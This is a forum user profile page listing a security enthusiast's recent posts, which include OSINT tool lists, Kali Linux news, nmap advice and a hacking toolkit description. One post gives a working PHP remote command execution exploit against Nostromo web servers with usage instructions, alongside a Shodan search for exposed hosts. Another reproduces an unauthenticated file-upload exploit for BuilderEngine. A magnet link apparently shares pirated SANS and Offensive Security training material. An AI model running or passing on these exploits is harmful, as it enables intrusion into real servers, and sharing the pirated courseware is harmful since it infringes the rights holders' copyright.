Jump to content

BiosHell

Active Members
  • Content Count

    400
  • Joined

  • Last visited

  • Days Won

    21

BiosHell last won the day on November 25

BiosHell had the most liked content!

Community Reputation

282 Excellent

11 Followers

About BiosHell

  • Rank
    Active Member

Recent Profile Visitors

3401 profile views
  1. Daca merita Security+ ?? Categoric NU, du-te inspre alte certificari care sunt mai relevante
  2. Recon and Intel Gathering Tools 1. OSINT Framework 2. CheckUserNames 3. HaveIbeenPwned 4. BeenVerified 5. Censys 6. BuiltWith 7. Google Dorks 8. Maltego 9. Recon-Ng 10. theHarvester 11. Shodan 12. Jigsaw 13. SpiderFoot 14. Creepy 15. Nmap 16. WebShag 17. OpenVAS 18. Fierce 19. Unicornscan 20. Foca Reference Link : https://securitytrails.com/blog/top-20-intel-tools
  3. Kali Linux 2019.4 includes new undercover mode for pentesters doing work in public places Offensive Security, maintainers of the popular Kali Linux open source project, released Kali Linux 2019.4, the latest iteration of the Kali Linux penetration testing platform. The new release includes several new features, including a new default desktop environment, a new theme and a new undercover mode for pentesters doing assessment work in public places. Move from Gnome to Xfce The most noteworthy aspect of the 2019.4 release is Kali’s move from the Gnome environment to Xfce to address some known issues. Specific improvements as a result of the new environment include: Improved performance – The Gnome environment is a fully-featured desktop environment with many capabilities. However all the capabilities come with overhead that is often not useful for a distribution like Kali. Moving to the more lightweight Xfce environment addresses these issues, providing an environment more in line with the typical Kali user’s needs. Unified UI – Because Kali can be run on everything from bare metal to high end laptops, the lower-end ARM builds often had a different UI than other deployments. OffSec now offers a standardized UI for all Kali distributions. Kali Undercover Let’s say you are working in a public place and you might not want the distinctive Kali dragon for everyone to see and wonder what it is you are doing. The developers made a little script that will change your Kali theme to look like a default Windows installation. That way, you can work a bit more incognito. After you are done and in a more private place, run the script again and you switch back to your Kali theme. Other Kali Linux 2019.4 updates Kali Documentation has a new home and is now Git powered Public Packaging – getting your tools into Kali Kali NetHunter KeX – Full Kali desktop on Android BTRFS during setup Added PowerShell The kernel is upgraded to version 5.3.9 Plus the normal bugs fixes and updates.
  4. BiosHell

    Nostromo RCE

    I'm just gonna leave this here : https://www.shodan.io/search?query=nostromo
  5. <!-- # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved" 1) Unauthenticated Unrestricted File Upload: POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ Vulnerable Parameter: files[] We can upload test.php and reach the file via the following link: /files/test.php --> <html> <body> <form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /> <input type="submit" value="send" /> </form> </body> </html> Reference Link : https://www.exploit-db.com/exploits/40390
  6. BiosHell

    Nostromo RCE

    <?php $hos = $argv[1]; $cmd = $argv[2]; $po = explode(":", $hos); $fp = fsockopen($po[0], $po[1]); fwrite($fp, "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n"); fwrite($fp, "Content-Length: 1\r\n\r\necho\necho\n{$cmd} 2>&1"); while (!feof($fp)) { echo fgets($fp, 1024); } ?> usage : php nostromo.php ip:port "commands"
  7. CQURE Team has prepared tools used during penetration testing and packed those in a toolkit named CQTools. This toolkit allows to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team. CQURE was the first team that did full reverse engineering of DPAPI (Data Protection Application Programming Interface) and prepared the first public tool that allows monitoring WSL (Windows Subsystem for Linux) feature. This toolkit allows you to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team; some of the tools took years to complete, and all of the tools work in a straightforward manner. CQTools is the ultimate toolkit to have when delivering a penetration test. The tools work simply, and we use them in practice during our cybersecurity assignments. Come and have a look at how our CQTools can boost your penetration testing experience! Reference Link : https://www.kitploit.com/2019/05/cqtools-new-ultimate-windows-hacking.html
  8. 1. Cum folosesti nmap-ul?did you rtfm?sunt multe moduri in a scana dupa porturi deschise....de ce te bazezi doar pe un tool? 2. Ti-as zice sa ai grija la firewall, dar n-ai asa ceva in HTB....ai grija cum dai scan,pentru ce dai scan si in ce fel 3. Nu pot sa cred ca NU merge cum trebuie nmap asa fara nici un fel de motiv. 4. nu exista asa ceva sa nu iti arate porturile corecte, doar in cazul unui scan pe UDP sa zicem si vezi toate porturile deschise(acolo da, false positives)
  9. magnet:?xt=urn:btih:f91feb6d2ea93f1c3c03b6be52051c2df72da1b7&dn=CERTCOLLECTION+-+BASELINE+-+SANS+%26+Offensive-Security&tr=udp%3A//tracker.coppersurfer.tk%3A6969&tr=udp%3A//tracker.zer0day.to%3A1337&tr=udp%3A//public.popcorn-tracker.org%3A6969&tr=udp%3A//tracker.leechers-paradise.org%3A6969&tr=udp%3A//explodie.org%3A6969
×
×
  • Create New...